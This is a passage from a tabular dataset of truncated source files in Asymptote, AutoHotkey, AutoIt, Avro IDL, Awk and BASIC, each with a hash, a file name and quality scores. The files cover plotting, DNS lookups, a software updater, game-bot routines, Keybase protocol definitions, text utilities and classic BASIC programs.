heavygray);draw(graph(g,-four, four), black);clip((-end-r,-end-r)--(-end-r, end+r)--(end+r,end+r)--(end+r, -end-r)--cycle);label(""$\textbf{(A)}$"", (-5,4.5));","47","1.146341463414634","0.0","0.0" -"061eeb76a4402aa329277764e2d01090877c3eef","recplot.asy",".asy","Asymptote","// 使用自适应方法产生 y = f(x) 的图象 guide -guide plot(real f(real), real min, real max, int nplotpoints=10, int maxrec=7) -{ - if (nplotpoints < 2) - nplotpoints = 2; - // 描初始的 nplotpoints 个点，并估计函数变化幅度 - pair[] fpoints; - real fmax = -infinity, fmin = infinity; - for (int i = 0; i <= nplotpoints; ++i) { - real x = min + i/nplotpoints * (max-min); - pair z = (x, f(x)); - fmax = max(fmax, z.y); - fmin = min(fmin, z.y); - fpoints.push(z); - } - // 定义辅助的递归函数：在规定的递归次数之内，在两个样本点之间描新点 - // 误差 fuzz 达到函数变化幅度估计值的 1/500 为止 - // 这个误差值在一般屏幕显示上只有一两个像素 - real fuzz = max(0.002(fmax-fmin), realEpsilon); - guide helper(int nrec, pair a, pair b) - { - if (nrec == 0) - return b; - pair mid = (a+b)/2; - pair z = (mid.x, f(mid.x)); - if (abs(z.y-mid.y) < fuzz) - return z -- b; - else - return helper(nrec-1, a, z) -- helper(nrec-1, z, b); - } - // 递归构造 guide - guide g = fpoints[0]; - for (int i = 0; i < nplotpoints; ++i) - g = g -- helper(maxrec, fpoints[i], fpoints[i+1]); - return g; -} - - - -","47","1.146341463414634","0.0","0.0" -"1115b32a96640694575980ea3ae012d83dedb5ea","skeleton_base.asy",".asy","Asymptote","include ""skeleton_common.asy""; - -real soff = 0.5; -point dd = d + mov(d, e, ddir, soff); -point ee = e + mov(e, f, edir, soff); -point ff = f + mov(f, g, fdir, soff); -point gg = g + mov(g, h, gdir, soff); -point hh = h + mov(h, a, hdir, soff); -point aa = a + mov(a, b, adir, soff); -point bb = b + mov(b, c, bdir, soff); -point cc = c + mov(c, d, cdir, soff); -real soff0 = 1; -point dd0 = d + mov(d, e, ddir, soff0); -point ee0 = e + mov(e, f, edir, soff0); -point ff0 = f + mov(f, g, fdir, soff0); -point gg0 = g + mov(g, h, gdir, soff0); -point hh0 = h + mov(h, a, hdir, soff0); -point aa0 = a + mov(a, b, adir, soff0); -point bb0 = b + mov(b, c, bdir, soff0); -point cc0 = c + mov(c, d, cdir, soff0); - -path coast0 = aa--bb--cc--dd--ee--ff--gg--hh--cycle; -path coast1 = aa0--bb0--cc0--dd0--ee0--ff0--gg0--hh0--cycle; - -draw(coast0, green, EndArrow(5, position=0.8)); -draw(coast1, cyan, EndArrow(5, position=0.8)); -draw(a--((a + oa) * 0.5), blue + linewidth(1.2)); -draw(coastline, solid+linewidth(1.2)+red); -label(""","47","1.146341463414634","0.0","0.0" -"0a0ab99f367801b3f55a35a0f812e762132dc17d","tm-b4.asy",".asy","Asymptote","include ""pictures/segment.asy""; -include ""pictures/trapezoid.asy""; - -unitsize(0.6cm, 0.3cm); - -draw(segs[0]); -draw(segs[1]); -draw(segs[2]); - -draw_vcomplement_pos_inf(segs[0].l); -draw_vcomplement_pos_neg(segs[0].l); -draw_vcomplement_pos_neg(segs[0].r); -draw_vcomplement_pos_inf(segs[1].l); -draw_vcomplement_pos_inf(segs[1].r); -draw_vcomplement_pos_neg(segs[1].r); -draw_vcomplement_pos_inf(segs[2].r); -draw_vcomplement_pos_neg(segs[2].r); - -draw_vcomplement(segs[0].r, segs[1]); -draw_vcomplement(segs[1].l, segs[0]); - -draw(segs[3].l--segs[3].r, dashed); - -label_seg(0, SE, 0.4); -label_seg(1, N); -label_seg(2, SE); -label_seg(3, S); - -label_trapezoid((2, 5), 0, 1); -label_trapezoid((6.0, 0), 1, 1); -label_trapezoid((4.2, 9), 2, 2); -label_trapezoid((6.5, 7), 3, 2); -label_trapezoid((7.7, 12), 4, 2); -label_trapezoid((9.3, 0.5), 5, 2); -label_trapezoid((11.4, 4), 6, 3); -label_trapezoid((11.4, 12), 7, 3); -label_trapezoid((12.55, 5), 8, 3); - -dot((14.5, 15), invisible); - -","47","1.146341463414634","0.0","0.0" -"03a37178d8891cd587720d8f07986bbedcecf644","isect-1-b.asy",".asy","Asymptote","unitsize(0.5inch); - -pair p = (4,5); -dot(p); -label(""$p$"", p, W); -pair r = (13,4); - -pair v = p * 0.6 + r * 0.4; -pair prev = v + (-2, 2); -pair next = v + (3, -1); - -dot(prev); -label(""$v_{i-1}$"", prev, W); -dot(v); -label(""$v_{i}$"", v, S); -dot(next); -label(""$v_{i+1}$"", next, SE); - -draw(prev--v--next); -draw(p--r, gray); -","47","1.146341463414634","0.0","0.0" -"006f47c618739acf61c084ec52ef2dbae1387fe0","List.ahk",".ahk","AutoHotkey","FileSelectFolder, Folder -FileList = ; 初始化为空。 -Loop, %Folder%\*.jpg, , 1 ; 在子文件夹中搜索。 -FileList = %FileList%%A_LoopFileName%`n -Sort, FileList, StringSort -StringSort(a1, a2) -{ - if(StrLen(a1)>strlen(a2)) - - return a1 > a2 ? 1 : a1 < a2 ? -1 : 0 -} - -Loop, parse, FileList, `n -{ - if A_LoopField = ; 忽略在列表底部的空白。 - continue - FileAppend, `n, d:\Test.txt -}","308","0.9871794871794872","0.0","0.0" -"0812d8988dcb4716cedbb2dfa696b63be3b620bb","DnsQueryTxtRecord.ahk",".ahk","AutoHotkey","; by jNizM https://www.autohotkey.com/boards/viewtopic.php?p=92605&sid=2d7c28698c4dde0d498cfa85f4a86485#p92605 -ResolveHostname(hostname) { - local ; Force-local mode - VarSetCapacity(WSADATA, 394 + (A_PtrSize - 2) + A_PtrSize, 0) - if (DllCall(""ws2_32\WSAStartup"", ""ushort"", 0x0202, ""ptr"", &WSADATA) != 0) - return ""WSAStartup failed"", DllCall(""ws2_32\WSACleanup"") - - VarSetCapacity(hints, 16 + 4 * A_PtrSize, 0) - NumPut(2, hints, 4, ""int"") && NumPut(1, hints, 8, ""int"") && NumPut(6, hints, 12, ""int"") - if (DllCall(""ws2_32\getaddrinfo"", ""astr"", hostname, ""ptr"", 0, ""ptr"", &hints, ""ptr*"", result)) - return ""getaddrinfo failed with error: "" DllCall(""ws2_32\WSAGetLastError""), DllCall(""ws2_32\WSACleanup"") - - addr := result, IPList := [] - while (addr) { - ipaddr := DllCall(""ws2_32\inet_ntoa"", ""uint"", NumGet(NumGet(addr+0, 16 + 2 * A_PtrSize) + 4, 0, ""uint""), ""astr"") - IPList[A_Index] := ipaddr, addr := NumGet(addr+0, 16 + 3 * A_PtrSize) - ","308","0.9871794871794872","0.0","0.0" -"01361bdb2726bbeefda867486d8d4dff1b715666","_Scroller2.ahk",".ahk","AutoHotkey","_() - w := 500, h := 400 - hForm := Form_New(""Resize e3 w500 h400"") - - hToolbar := Form_Add(hForm, ""Toolbar"", """", ""gOnToolbar style=flat il=3"") - hPanel := Form_Add(hForm, ""Panel"", """", ""x5 y50 w"" w-15 "" h"" h-55, ""Attach w h"") - - Loop, 10 - Form_Add(hPanel, ""Edit"", ""Edit "" A_Index, ""vscroll R5"", ""Align T, 100"", ""Attach w"") - - Form_Add(hPanel, ""Text"", ""Footer"", ""center"", ""Align T"", ""Attach w"") - Toolbar_Insert(hToolbar, ""cut`ncopy`npaste`nredo`nundo"") - - Panel_SetStyle(hPanel, ""scroll"") - Form_Show() -return - -Form1_Close: - ExitApp -return - -#include ..\..\inc -#include _Forms.ahk","308","0.9871794871794872","0.0","0.0" -"1478b4a9b924b86a5b7c1becda6f0273e21f2e57","bigctrl.ahk",".ahk","AutoHotkey","; Copyright (c) 2012 Benjamin Hansen -; -; Permission is hereby granted, free of charge, to any person -; obtaining a copy of this software and associated documentation files -; (the ""Software""), to deal in the Software without restriction, -; including without limitation the rights to use, copy, modify, merge, -; publish, distribute, sublicense, and/or sell copies of the Software, -; and to permit persons to whom the Software is furnished to do so, -; subject to the following conditions: -; -; The above copyright notice and this permission notice shall be -; included in all copies or substantial portions of the Software. -; -; THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, -; EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -; MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -; NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS -; BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN -; ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI","308","0.9871794871794872","0.0","0.0" -"08cbfdb1b63a8db120fb408bfeb79a7c293a0488","AkelUpdater.ahk",".ahk","AutoHotkey","/* AkelUpdater wrapper -Version: 1.0 -Last time modified: 2015.04.12 18:41 - -Description: a wrapper for AkelUpdater.exe that will checks for new versions of the original AkelUpdater.exe and update it (as AkelUpdater.original.exe) if needed. - -Script author: Drugoy a.k.a. Drugmix -Contacts: idrugoy@gmail.com, drug0y@ya.ru -https://github.com/Drugoy/AkelPad-extras/blob/master/AkelFiles/AkelUpdater.ahk -*/ - -#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases. -SetWorkingDir, %A_ScriptDir% ; Ensures a consistent starting directory. -#SingleInstance, Force -ListLines, On -; #NoTrayIcon - -isAUOutdated := checkAUFreshness() -If (isAUOutdated) ; There is either an update or file 'AkelUpdater.original.exe' doesn't yet exist. -{ - TrayTip, AkelUpdater, New version detected!`nUpdating it., 3 - WinClose, ahk_exe AkelUpdater.original.exe - getNewAU() - Run, AkelUpdater.original.exe -} - - -getNewAU() -{ - IfNotExist, AkelUpdater - FileCreateDir, AkelUpdater - URLDownloadToFile, % ""http","308","0.9871794871794872","0.0","0.0" -"0fc7c9c13ab47054747f46da10bd98fa6f9fbc51","AndroidKOPLAYER.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== -; Name ..........: OpenKOPLAYER -; Description ...: Opens new KOPLAYER instance -; Syntax ........: -; Parameters ....: None -; Return values .: None -; Author ........: Cosote (04-2016) -; Modified ......: -; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2019 -; MyBot is distributed under the terms of the GNU GPL -; Related .......: -; Link ..........: https://github.com/MyBotRun/MyBot/wiki -; Example .......: No -; =============================================================================================================================== - -Func OpenKOPLAYER($bRestart = False) - - Local $PID, $hTimer, $iCount = 0, $process_killed, $cmdOutput, $connected_to, $cmdPar - - SetLog(""Starting "" & $g_sAndroidEmulator & "" and Clash Of Clans"", $COLOR_GREEN) - - If Not InitAndroid() Then Return - - Local $launchAndroid = ","348","1.12987012987013","0.0","0.0" -"0613e52631105319e58d974ef65c2a5fdef07383","File.au3",".au3","AutoIt","#include-once - -#include ""Array.au3"" -#include ""FileConstants.au3"" -#include ""StringConstants.au3"" - -; #INDEX# ======================================================================================================================= -; Title .........: File -; AutoIt Version : 3.3.15.0 -; Language ......: English -; Description ...: Functions that assist with files and directories. -; Author(s) .....: Brian Keene, Michael Michta, erifash, Jon, JdeB, Jeremy Landes, MrCreatoR, cdkid, Valik, Erik Pilsits, Kurt, Dale, guinness, DXRW4E, Melba23 -; =============================================================================================================================== - -; #CURRENT# ===================================================================================================================== -; _FileCountLines -; _FileCreate -; _FileListToArray -; _FileListToArrayRec -; _FilePrint -; _FileReadToArray -; _FileWriteFromArray -; _FileWriteLog -; _FileWriteToLine -; _PathFull -; _PathGetRelative -; _PathMake","348","1.12987012987013","0.0","0.0" -"061e380c5085b0604056589190d9bb70503ca111","TrainSystem.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== -; Name ..........: Train Revamp Oct 2016 -; Description ...: -; Syntax ........: -; Parameters ....: None -; Return values .: None -; Author ........: Mr.Viper(10-2016), ProMac(10-2016), CodeSlinger69 (01-2018) -; Modified ......: ProMac (11-2016), Boju (11-2016), MR.ViPER (12-2016), CodeSlinger69 (01-2018) -; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2019 -; MyBot is distributed under the terms of the GNU GPL -; Related .......: -; Link ..........: https://github.com/MyBotRun/MyBot/wiki -; Example .......: No -; =============================================================================================================================== -#include-once -#include -#include - -Func TrainSystem() - If Not $g_bTrainEnabled Then ; check for training disabled in halt mode - If $g","348","1.12987012987013","0.0","0.0" -"0dfcb03293fbb9a6148ff2c6252dabaf634ded41","_Excel_RangeWrite.au3",".au3","AutoIt","#AutoIt3Wrapper_AU3Check_Stop_OnWarning=Y -#AutoIt3Wrapper_AU3Check_Parameters=-d -w 1 -w 2 -w 3 -w 4 -w 5 -w 6 - -#include -#include -#include - -; Create application object and create a new workbook -Global $oAppl = _Excel_Open() -If @error <> 0 Then Exit MsgBox($MB_SYSTEMMODAL, ""Excel UDF: _Excel_RangeWrite Example"", ""Error creating the Excel application object."" & @CRLF & ""@error = "" & @error & "", @extended = "" & @extended) -Global $oWorkbook = _Excel_BookNew($oAppl) -If @error <> 0 Then - MsgBox($MB_SYSTEMMODAL, ""Excel UDF: _Excel_RangeWrite Example"", ""Error creating the new workbook."" & @CRLF & ""@error = "" & @error & "", @extended = "" & @extended) - _Excel_Close($oAppl) - Exit -EndIf - -Example1($oWorkbook) -Example2($oWorkbook) -Example3($oWorkbook) -Example4($oWorkbook) - -Exit - -; ***************************************************************************** -; Example 1 -; Write a string with a line break to the active sheet in the active workbook -; *****","348","1.12987012987013","0.0","0.0" -"0de47799ec0d7ea03a723a5d62c794c0ed450e10","readConfig.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== -; Name ..........: readConfig.au3 -; Description ...: Reads config file and sets variables -; Syntax ........: readConfig() -; Parameters ....: NA -; Return values .: NA -; Author ........: -; Modified ......: -; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2016 -; MyBot is distributed under the terms of the GNU GPL -; Related .......: -; Link ..........: https://github.com/MyBotRun/MyBot/wiki -; Example .......: No -; =============================================================================================================================== - -Func readConfig() ;Reads config and sets it to the variables - If FileExists($building) Then - $TownHallPos[0] = IniRead($building, ""other"", ""xTownHall"", ""-1"") - $TownHallPos[1] = IniRead($building, ""other"", ""yTownHall"", ""-1"") - $iTownHallLevel = IniRead($building,","348","1.12987012987013","0.0","0.0" -"091227738dc45ce43eb3e0ab60ac2716a3ebef0e","CommonDataTypes_v4.1.avdl",".avdl","Avro IDL","/** - * With credits to Oculus Info Inc for the influence of this document. Released - * under the MIT License. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the ""Software""), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMA","14","1.5555555555555556","0.0","0.0" -"0ca3b2dc9f0082ee513e97c11446098d7f9eae30","block.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") - -protocol block { - import idl ""backend_common.avdl""; - - record GetBlockRes { - string blockKey; - bytes buf; - } - - // Fixed-size nonce to identify a reference to a block - fixed BlockRefNonce(8); - - record BlockReference { - BlockIdCombo bid; - BlockRefNonce nonce; - UserOrTeamID chargedTo; - } - - record BlockReferenceCount{ - BlockReference ref; - int liveCount; - } - - record DowngradeReferenceRes{ - array completed; - BlockReference failed; - } - - record BlockPingResponse { - // In the future, we might want to respond with timestamps or - // ping intervals. - } - - - ChallengeInfo getSessionChallenge(); - void authenticateSession(string signature); - - void putBlock(BlockIdCombo bid, string folder, string blockKey, bytes buf); - void putBlockAgain(string folder, BlockReference ref, string blockKey, bytes buf); - GetBlockRes getBlock(BlockIdCombo bid, string folder); - - void addReference(string folder, BlockReference re","14","1.5555555555555556","0.0","0.0" -"06deaa09eca05f0c164a9cf05f5b5184b22b97fb","simple_fs.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") - -protocol SimpleFS { - - import idl ""common.avdl""; - import idl ""kbfs_common.avdl""; - -/* - File manipulation interface - - Caller provides OpID to one of these methods to begin an operation: - simpleFSList - simpleFSListRecursive - simpleFSListRecursiveToDepth - simpleFSCopy - simpleFSOpen - simpleFSMove - simpleFSRemove - simpleFSGetRevisions - then calls one of the following until status is no longer pending - or operation is cancelled: - simpleFSReadList (after list, listRecursive, or listRecursiveToDepth) - simpleFSGetRevisions (after getRevisions) - simpleFSRead (after open) - simpleFSWrite (after open) - simpleFSCheck (after copy, move or remove) - Caller can optionally block by calling wait() - Operation must be closed by calling close -*/ - - // Random GUID provided by caller - fixed OpID(16); - - @typedef(""int64"") @lint(""ignore"") record KBFSRevision {} - - enum KBFSArchivedType { - REVISION_0, - TIME_1, - TIME_STRING_2, - R","14","1.5555555555555556","0.0","0.0" -"086e1037f07357ba92ba6633205f00aeca08fd67","notify_badges.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") -protocol NotifyBadges { - import idl ""common.avdl""; - - @typedef(""bytes"") record ChatConversationID {} - - record BadgeState { - @lint(""ignore"") - int newTlfs; - int rekeysNeeded; - int newFollowers; - int inboxVers; - - array conversations; - array newGitRepoGlobalUniqueIDs; - array newTeamIDs; - array newTeamAccessRequests; - } - - record BadgeConversationInfo { - ChatConversationID convID; - map badgeCounts; - int unreadMessages; - } - - @notify("""") - void badgeState(BadgeState badgeState); -} -","14","1.5555555555555556","0.0","0.0" -"11354dccbdd124454bd28c72353d9c59eaf9080d","Persistence_v2.0.avdl",".avdl","Avro IDL","/* - * Copyright (C) 2013-2015 Uncharted Software Inc. - * - * Property of Uncharted(TM), formerly Oculus Info Inc. - * http://uncharted.software/ - * - * Released under the MIT License. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy of - * this software and associated documentation files (the ""Software""), to deal in - * the Software without restriction, including without limitation the rights to - * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies - * of the Software, and to permit persons to whom the Software is furnished to do - * so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEM","14","1.5555555555555556","0.0","0.0" -"01cd116f44cad6ad0c29732a144b04e0d9afd5e8","extexi","","Awk","# Extract all examples from the manual source. -*- AWK -*- - -# This file is part of GNU Bison -# Copyright 1992, 2000, 2001, 2005 Free Software Foundation, Inc. -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA -# 02111-1307 USA - -# This script is for use with any Awk that conforms to POSIX. -# It was derived from a similar script tests/generate.awk in GNU","12","0.056074766355140186","0.0","0.0" -"0d2e74e28b9a3f13642ad29711702c0011ce2f69","awkexample","","Awk","#! /usr/bin/awk -f -#Note : on Solaris, use nawk instead - -BEGIN { - for (i = 0; i < ARGC; i++) - printf ""ARGV[%d] = %s\n"", i, ARGV[i] - exit -} -","12","0.056074766355140186","0.0","0.0" -"018bff001fef0ae54556d9082547987e8f6ad0f3","s87tbase","","Awk","#!/usr/bin/gawk -f -BEGIN{ -# TBASE=""/usr/local/share/bathy/tbase/tbase.grd"" - TBASE=ENVIRON[""TBASE""]; - - if (TBASE==""""){ - print ""export TBASE="" - exit 1 - } - - HOST=ENVIRON[""HOST""]; - - bathy="""" - } - -NR==1{ lat=$4; lon=$5 ; comm=""echo "" lon "" "" lat "" | grdtrack -Z -G"" TBASE - comm | getline TZ - TZ=-TZ; - } -/^[^#].*ZZ/{bathy=""#""} -/^@/{ print ""# "" strftime(""%Y/%m/%d %H:%M: "") ""Bathymetry from "" HOST "":"" TBASE "" ="" TZ ; - print bathy ""&ZZ="" TZ - } -{print} -","12","0.056074766355140186","0.0","0.0" -"18ac8b878b081f1846069d2aa2f7eecc3f00f926","file-format","","Awk","#! /usr/bin/awk -f -# file-format (AWK script) -- Reports line ending type for a group of files -# -# Note: in awk, it is impossible to tell if the last line doesn't have an LF - -# Shows the info for a the file that was just processed -function show_info() -{ - printf(""%s:\tlines: %d, CRs: %d, format: %s\n"", - prev_filename, prev_nr, cr_count, - cr_count == 0 ? ""Unix"" : (prev_nr != cr_count ? ""MISMATCH"" : ""dos"") ); -} - - -# *** MAINLINE *** -# Initialise at the start of each new file -FNR == 1 { - if (prev_filename != """") - { - show_info(); - } - - cr_count = 0; - # Track the filename ready for use at END or when a file change occurs - prev_filename = FILENAME; - } - -/\r$/ { ++cr_count; } -{ prev_nr = FNR; } - -END { - show_info(); - } -","12","0.056074766355140186","0.0","0.0" -"03cd6337f583ff64c1c868d31f59326962e2382f","awkdiff","","Awk","#!/usr/bin/awk -f -# -# $FreeBSD: releng/11.0/tools/tools/perforce/awkdiff 270727 2014-08-27 18:56:12Z jmg $ -# - -BEGIN { - #parentpath = ""//depot/vendor/freebsd/src/sys/"" - #childpath = ""//depot/projects/opencrypto/"" -} -$1 == ""===="" { - last_line = $0 - last_filename = $2 - #gsub(parentpath, """", last_filename) - gsub(/#[0-9]*$/, """", last_filename) - did_sub = 0 -} -$1 == ""===="" && $2 == """" { - new_file = $4 - gsub(childpath, """", new_file) - gsub(/#[0-9]*$/, """", new_file) - cmd = ""p4 print \"""" $4 ""\"" | sed '/^\\/\\/depot/d' | diff -u /dev/null /dev/stdin | sed s@/dev/stdin@"" new_file ""@"" - #print ""x"" cmd ""x"" - system(cmd) -} -$1 == ""===="" && $4 == """" { - del_file = $2 - gsub(parentpath, """", del_file) - gsub(/#[0-9]*$/, """", del_file) - cmd = ""p4 print \"""" $2 ""\"" | sed '/^\\/\\/depot/d' | diff -u /dev/stdin /dev/null | sed s@/dev/stdin@"" del_file ""@"" - #print ""x"" cmd ""x"" - system(cmd) -} -$1 != ""===="" { - if (!did_sub && (($1 == ""***************"") || ($1 == ""@@""))) { - print ""--- "", last_filename "".orig"" - ","12","0.056074766355140186","0.0","0.0" -"121250fd9f2b837fa7cb7c303be7fe4af1520108","merge.awk",".awk","Awk","# @(#)merge.awk 8.3 (Berkeley) 5/25/94 -# -# merge index entries into one line per label -$1 == prev { - printf "", %s"", $2; - next; -} -{ - if (NR != 1) - printf ""\n""; - printf ""%s \t%s"", $1, $2; - prev = $1; -} -END { - printf ""\n"" -} -","185","0.8644859813084113","0.0","0.0" -"062f4caf11ec33dbed52314ec169bd1769b37bb0","pm3_cmd_h2lua.awk",".awk","Awk","BEGIN { - print ""--[["" - print ""These are Proxmark command definitions."" - print ""This file is automatically generated from pm3_cmd.h - DON'T EDIT MANUALLY."" - print ""--]]"" - print ""local __commands = {"" -} - -#$1 ~ /#define/ && $2 ~ /^CMD_([[:alnum:]_])+/ { print $2, ""="", $3, "","" } -$1 ~ /#define/ && $2 ~ /^CMD_[A-Za-z0-9_]+/ { sub(/\r/, """"); print $2, ""="", $3 "","" } - -END { - print ""}"" - print ""return __commands"" -} -","185","0.8644859813084113","0.0","0.0" -"0dc4fed070b4a0c2498bd3c3c0b298f7a1163d3b","transpose.awk",".awk","Awk","BEGIN {FS="" ""} - -{ - for (i=1;i<=NF;i++) - { - arr[NR,i]=$i; - if(big <= NF) - big=NF; - } -} - -END { - for(i=1;i<=big;i++) - { - for(j=1;j<=NR;j++) - { - printf(""%s\t"",arr[j,i]); - } - printf(""\n""); - } -} - -","185","0.8644859813084113","0.0","0.0" -"0f3ed83876605c5b348face1f00c5e4653fb4176","in_D1.awk",".awk","Awk"," {printf(""INSERT INTO D1 VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\n"",$1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$35,$36,$37)} -","185","0.8644859813084113","0.0","0.0" -"07da6129c29f417e94b06af94e3acaca0adfd24b","printf.awk",".awk","Awk","#!/usr/bin/awk -f -function show(str) { - printf ""%"" str ""\t"" str ""\n"", ARGV[1] -} - -BEGIN { - if (ARGC == 1) { - print ""printf.awk "" - exit 1 - } - - show(""%a"") - show(""%A"") - show(""%c"") - show(""%d"") - show(""%03d"") - show(""%'d"") - show(""%e"") - show(""%E"") - show(""%f"") - show(""%F"") - show(""%.0f"") - show(""%.8f"") - show(""%g"") - show(""%.8g"") - show(""%G"") - show(""%i"") - show(""%o"") - show(""%s"") - show(""%40s"") - show(""%u"") - show(""%x"") - show(""%X"") - show(""%#x"") - show(""%#X"") -} -","185","0.8644859813084113","0.0","0.0" -"08fe16ac912daa615c6daef2dca5a72e5a760ad2","NAUCA026.BAS",".bas","BASIC","REM File: .bas -REM Data: -REM Programmer: Yuriy Lomako -REM Description: -REM ------------------------------------------------------------------- - -CLS -10 x = 0 -20 s = x * 900000000 -30 PRINT x; "" * 9000000000 = ""; s -40 x = x + 1 -50 GOTO 2 - - -","169","0.9135135135135135","0.0","0.0" -"0400c3001b22432c09230f9d5e88ff85469772a0","qryfrmTaskDBUI_cmbJobStatus.bas",".bas","BASIC","dbMemo ""SQL"" =""SELECT \""*\"" AS Status, \""*Show All\"" AS Label FROM cactblStatusTypes\015\012UNI"" - ""ON SELECT DISTINCT cactblStatusTypes.ID AS Status, cactblStatusTypes.StatusType "" - ""AS Label\015\012FROM cactblStatusTypes INNER JOIN cactblStatusTypesMM ON cactblS"" - ""tatusTypes.ID = cactblStatusTypesMM.StatusTypesTOPIDFK\015\012WHERE (((cactblSta"" - ""tusTypesMM.StatusTypeMIDIDFK)=648));\015\012"" -dbMemo ""Connect"" ="""" -dbBoolean ""ReturnsRecords"" =""-1"" -dbInteger ""ODBCTimeout"" =""0"" -dbByte ""RecordsetType"" =""0"" -dbBoolean ""OrderByOn"" =""0"" -dbByte ""Orientation"" =""0"" -dbByte ""DefaultView"" =""2"" -dbBoolean ""FilterOnLoad"" =""0"" -dbBoolean ""OrderByOnLoad"" =""-1"" -dbBoolean ""TotalsRow"" =""0"" -dbByte ""PublishToWeb"" =""1"" -dbBinary ""GUID"" = Begin - 0x27baa0f5cdd589488423638ce7f15fc3 -End -dbLongBinary ""DOL"" = Begin - 0x0acc0e5500000000000000000000000000000000000000000c00000005000000 , - 0x0000000000000000000000000000 -End -Begin - Begin - dbText ""Name"" =""Label"" - ","169","0.9135135135135135","0.0","0.0" -"0126ab77c2a8c7f1e1f5b982fad478f4739b5dfe","TEST.BAS",".bas","BASIC","10 REM PC-BASIC test -20 REM WRITE syntax -30 OPEN ""OUTPUT.TXT"" FOR OUTPUT AS 1 -40 ON ERROR GOTO 10000 -50 WRITE -60 WRITE, -70 WRITE 1 -80 WRITE 1, -90 WRITE ,1 -100 WRITE 1, A% -110 WRITE PRINT -120 WRITE 1 PRINT -130 WRITE 1, PRINT -150 WRITE#1 -160 WRITE#1, -170 WRITE#1 1 -180 WRITE#1 1, -190 WRITE#1 ,1 -210 WRITE#1 PRINT -220 WRITE#1, PRINT -230 WRITE#1, 1, PRINT -240 WRITE #1, 1, A%, 1#, ""One"" -9999 END -10000 PRINT#1, ERR, ERL -10010 RESUME NEXT -","169","0.9135135135135135","0.0","0.0" -"0ce8f7dec1d3bc1ee0a6006e25990bbb17344f52","P145.BAS",".bas","BASIC","10 PRINT ""PROGRAM FILE 145: ERROR - TWO ARGUMENTS IN LIST FOR"" -15 PRINT "" RND FUNCTION."" -20 PRINT "" ANSI STANDARD 7.2, 7.4, 8.2, 8.4"" -30 PRINT -40 PRINT ""SECTION 145.1: ERROR - TWO ARGUMENTS IN LIST FOR"" -45 PRINT "" RND FUNCTION."" -50 PRINT -60 PRINT ""THIS SECTION TESTS WHAT HAPPENS WHEN THE RND FUNCTION IS"" -70 PRINT ""INVOKED WITH TWO ARGUMENTS, INSTEAD OF NONE AS SPECIFIED"" -80 PRINT ""IN THE STANDARD."" -90 PRINT -100 PRINT ""THIS IS A TEST FOR A NON-STANDARD FEATURE OF MINIMAL BASIC."" -110 PRINT ""TO PASS THIS TEST, THE PROCESSOR MUST EITHER:"" -120 PRINT -130 PRINT "" 1) ACCEPT THE PROGRAM AND BE ACCOMPANIED BY DOCUMENTATION"" -140 PRINT "" ACCURATELY DESCRIBING THE FEATURE'S INTERPRETATION"" -150 PRINT "" BY THE PROCESSOR, OR"" -160 PRINT -170 PRINT "" 2) REJECT THE PROGRAM WITH AN APPROPRIATE ERROR MESSAGE"" -180 PRINT -190 PRINT ""SEE THE NBS MINIMAL BASIC TEST PROGRAMS USER'S MANUAL"" -200 PRINT ""FOR DETAILED CRITERIA."" -210 PRINT -220 PRINT "" BEGIN TEST"" -230 PRINT -240","169","0.9135135135135135","0.0","0.0" -"183e37cc23e90397c9e9ac8e9ea0f59c33d1c383","wumpus.bas",".bas","BASIC","PROGRAM LISTING -0010 REM- HUNT THE WUMPUS -0015 REM: BY GREGORY YOB -0020 PRINT ""INSTRUCTIONS (Y-N)""; -0030 INPUT I$ -0040 IF I$=""N"" THEN 52 -0050 GOSUB 1000 -0052 REM- ANNOUNCE WUMPUSII FOR ALL AFICIONADOS ... ADDED BY DAVE -0054 PRINT -0056 PRINT "" ATTENTION ALL 